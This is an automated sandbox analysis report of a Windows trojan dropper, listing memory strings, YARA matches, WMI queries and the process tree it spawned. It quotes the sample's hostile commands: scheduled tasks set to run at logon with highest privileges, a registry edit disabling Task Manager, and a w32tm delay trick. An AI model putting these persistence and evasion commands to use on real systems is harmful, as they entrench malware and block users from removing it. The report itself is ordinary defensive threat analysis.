0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru/auth/login
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://index.from.sh/pages/game.html

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.SurrogateContainerAgent.exe.37f5750.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: 42.2.zTShuhFeOCWKXCInUCSTgJmE.exe.3772f08.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: 31.2.zTShuhFeOCWKXCInUCSTgJmE.exe.335e9c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: 20.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2e04cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: 39.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2c3e770.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0034718C
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034857B0_2_0034857B
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036D00E0_2_0036D00E
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034407E0_2_0034407E
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003570BF0_2_003570BF
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003711940_2_00371194
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034E2A00_2_0034E2A0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003432810_2_00343281
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003602F60_2_003602F6
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003566460_2_00356646
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036473A0_2_0036473A
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036070E0_2_0036070E
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003427E80_2_003427E8
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003537C10_2_003537C1
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034E8A00_2_0034E8A0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034F9680_2_0034F968
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003649690_2_00364969
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00353A3C0_2_00353A3C
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00356A7B0_2_00356A7B
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036CB600_2_0036CB60
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00360B430_2_00360B43
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00355C770_2_00355C77
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034ED140_2_0034ED14
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00353D6D0_2_00353D6D
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035FDFA0_2_0035FDFA
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034BE130_2_0034BE13
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034DE6C0_2_0034DE6C
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00345F3C0_2_00345F3C
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00360F780_2_00360F78
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 20_2_00007FF887B05AC020_2_00007FF887B05AC0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BB388828_2_00007FF887BB3888
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BB4FA028_2_00007FF887BB4FA0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BACD6828_2_00007FF887BACD68
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BAACB828_2_00007FF887BAACB8
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BB238028_2_00007FF887BB2380
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BB7A4828_2_00007FF887BB7A48
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BAA1DB28_2_00007FF887BAA1DB
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BAC73828_2_00007FF887BAC738
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BB43E028_2_00007FF887BB43E0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BAAB2828_2_00007FF887BAAB28
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BB8A3028_2_00007FF887BB8A30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BB5AC028_2_00007FF887BB5AC0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 31_2_00007FF887BA5AC031_2_00007FF887BA5AC0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BB388836_2_00007FF887BB3888
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BB4FA036_2_00007FF887BB4FA0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BACD6836_2_00007FF887BACD68
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BB238036_2_00007FF887BB2380
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BAA1DB36_2_00007FF887BAA1DB
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BB43E036_2_00007FF887BB43E0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BAAB2836_2_00007FF887BAAB28
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BB8A3036_2_00007FF887BB8A30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BB5AC036_2_00007FF887BB5AC0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB388839_2_00007FF887BB3888
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB244539_2_00007FF887BB2445
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB5F2139_2_00007FF887BB5F21
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB4E6D39_2_00007FF887BB4E6D
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB6DCD39_2_00007FF887BB6DCD
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB43E039_2_00007FF887BB43E0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB8A3039_2_00007FF887BB8A30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB1DA939_2_00007FF887BB1DA9
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BB5AC039_2_00007FF887BB5AC0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: String function: 0035ED00 appears 31 times
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: String function: 0035E360 appears 52 times
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: String function: 0035E28C appears 35 times
            Source: SurrogateContainerAgent.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: adKGhCOOzg.exe, 00000000.00000003.1349439122.0000000003472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000003.1349439122.0000000003472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000002.1350105554.0000000003472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000002.1350105554.0000000003472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000003.1349412124.0000000003487000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000003.1349412124.0000000003487000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Source: 5.2.SurrogateContainerAgent.exe.37f5750.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 42.2.zTShuhFeOCWKXCInUCSTgJmE.exe.3772f08.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 31.2.zTShuhFeOCWKXCInUCSTgJmE.exe.335e9c0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 20.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2e04cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 39.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2c3e770.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 5.2.SurrogateContainerAgent.exe.38823f8.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.SurrogateContainerAgent.exe.37cb250.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.SurrogateContainerAgent.exe.3923498.18.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.SurrogateContainerAgent.exe.1c5d0000.33.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.SurrogateContainerAgent.exe.1c530000.29.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@61/23@1/1
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00346EC9 GetLastError,FormatMessageW,0_2_00346EC9
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00359E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00359E1C
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SurrogateContainerAgent.exe.logJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1020:120:WilError_03
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMutant created: \Sessions\1\BaseNamedObjects\Local\03200b193f5b3654f058ad1d9fd2571cad4b5a01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile created: C:\Users\user\AppData\Local\Temp\K0Xr29C3HFJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs"
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCommand line argument: sfxname0_2_0035D5D4
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCommand line argument: sfxstime0_2_0035D5D4
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCommand line argument: STARTDLG0_2_0035D5D4
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCommand line argument: xj90_2_0035D5D4
            Source: adKGhCOOzg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: adKGhCOOzg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: adKGhCOOzg.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeFile read: C:\Users\user\Desktop\adKGhCOOzg.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\adKGhCOOzg.exe "C:\Users\user\Desktop\adKGhCOOzg.exe"
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portcontainerRef\SurrogateContainerAgent.exe "C:\portcontainerRef\SurrogateContainerAgent.exe"
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 11 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 7 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 5 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknownProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: unknownProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
